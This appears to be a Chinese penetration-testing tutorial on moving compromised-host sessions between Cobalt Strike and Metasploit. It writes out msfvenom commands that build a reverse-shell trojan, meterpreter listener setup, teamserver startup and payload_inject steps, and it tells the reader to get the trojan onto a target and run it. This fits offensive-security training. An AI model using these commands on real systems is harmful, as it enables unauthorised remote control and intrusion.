当前位置: 首页 > news >正文

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

在渗透中,有时候 Cobalt Strike 会话可能会受限制,所以我们需要把 Cobalt Strike 会话转移到 MSF 上进行后面的渗透。也有的时候会话在 MSF 上,但是我们需要 操作更简便 或者 展示力更好,所以我们会把 MSF 上的会话转移到 Cobalt Strike 上进行后面的渗透.


目录:

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

在 MSF 会话中 转移 会话到 CS 上.

(1)上线 MSF 会话.

(2)进行监听模式.

(3)开启 Cobalt Strike 工具.

(4)添加一个监听.

(5)会话转移到 CS 中.

在 CS 会话中 转移 会话到 MSF 上.

(1)开启 Cobalt Strike 工具.

(2)添加一个监听.

(3)生成一个程序.(木马)

(4)重新添加一个监听器.

(5)会话转移到 MSF 中.


在 MSF 会话中 转移 会话到 CS 上.

(1)上线 MSF 会话.

生成一个程序后面(木马):msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4422 -f exe > bgxg.exe


(2)进行监听模式.

(1)msfconsole(2)use exploit/multi/handler(3)set payload windows/meterpreter/reverse_tcp(4)set lhost 192.168.0.106                            # 本地 IP 地址(5)set LPORT 4422                                     # 和后面一样的端口(6)run


(3)开启 Cobalt Strike 工具.

服务端:(1)cd cs4.7        //切换为 cs 目录(2)chmod a+x ./TeamServerImage         // 修改权限.(3)./teamserver 192.168.0.106 888888   //这里的IP地址是 服务端的IP,后面的是客户端的登录密码.


客户端:(1)cd cs4.7        // 切换为 cs 目录(2)./start.sh        // 打开 客户端.


(4)添加一个监听.


(5)会话转移到 CS 中.

(1)background                // 挂起 会话.(2)use exploit/windows/local/payload_inject(3)set payload windows/meterpreter/reverse_http(4)set lhost 192.168.0.101        //设置 CS 服务端的 IP 地址.(5)set lport 8080               //设置 CS 服务端的 监听的端口(刚刚上面创建的端口号一样[CS的])(6)set DisablePayloadHandler True(7)set PrependMigrate True(8)sessions -l  //查看 会话 是多少则设置多少(9)set session 1 [一般是 1(上面查看的结果)](10)exploit      // 进行 测试.


在 CS 会话中 转移 会话到 MSF 上.

(1)开启 Cobalt Strike 工具.

服务端:(1)cd cs4.7        //切换为 cs 目录(2)chmod a+x ./TeamServerImage         // 修改权限.(3)./teamserver 192.168.0.106 888888   //这里的IP地址是 服务端的IP,后面的是客户端的登录密码.


客户端:(1)cd cs4.7        // 切换为 cs 目录(2)./start.sh        // 打开 客户端.


(2)添加一个监听.


(3)生成一个程序.(木马)

想方法,把这个程序上传到目标主机并执行这个执行.


(4)重新添加一个监听器.


(5)会话转移到 MSF 中.

(1)msfconsole                    // 打开 MSF 工具(2)use exploit/multi/handler                                   // 设置 监听 模块.(3)set payload windows/meterpreter/reverse_http                // 设置 payload(4)set lport 9999                        // 设置一个端口(和上面的监听一样的端口)(5)set lhost 0.0.0.0                    // 设置本地的 IP 地址(6)exploit                              // 进行测试

       

       

       

http://www.lryc.cn/news/94300.html

相关文章:

  • 性能测试讲解超详细Jmeter
  • 微服务 – Spring Cloud – Nacos 配置中心
  • 超细,设计一个“完美“的测试用例,用户登录模块实例...
  • 【C#】文件拖拽,获取文件路径
  • SAP PI/PO初步了解 2023.07.03
  • Java中生产者消费者模型
  • 测试Hyperledger Fabric环境
  • ClickHouse查询sql长度超超过最大限制
  • 【Axure教程】拖动调整行高列宽的表格
  • 中间件-netty(1)
  • 【方法】想把PDF文档转换成PPT,如何操作?
  • Linux--设置目录或文件的默认权限:umask权限掩码
  • C++实现websocket单server单client全双工通信(基于boost!!!)
  • 好用的网址5
  • 做项目去实习到底做的什么?
  • VSC++: 验证身份证
  • 机器学习-方差和偏差理论
  • 力扣 669. 修剪二叉搜索树
  • ChatGPT在多轮对话中的表现如何?
  • C++ 虚函数 (virtual function) 介绍
  • 写给小白的ChatGPT和AI原理
  • 多元回归预测 | Matlab基于麻雀算法(SSA)优化混合核极限学习机HKELM回归预测, SSA-HKELM数据回归预测,多变量输入模型
  • High Performance Visual Tracking with Siamese Region Proposal Network(SiamRPN)
  • 【Vue3 生态】VueRouter 路由核心知识点
  • SpringCloud-Nacos配置管理
  • 物流智能分拣管理
  • Qt编写视频监控系统79-四种界面导航栏的设计
  • 界面开发框架Qt新手入门教程:如何使用Calendar组件创建日历(二)
  • charles unknown 问题和手机代理设置(iOS手机)
  • 【备战秋招】每日一题:2023.03.26-阿里OD机试(第三题)-数组之和最小值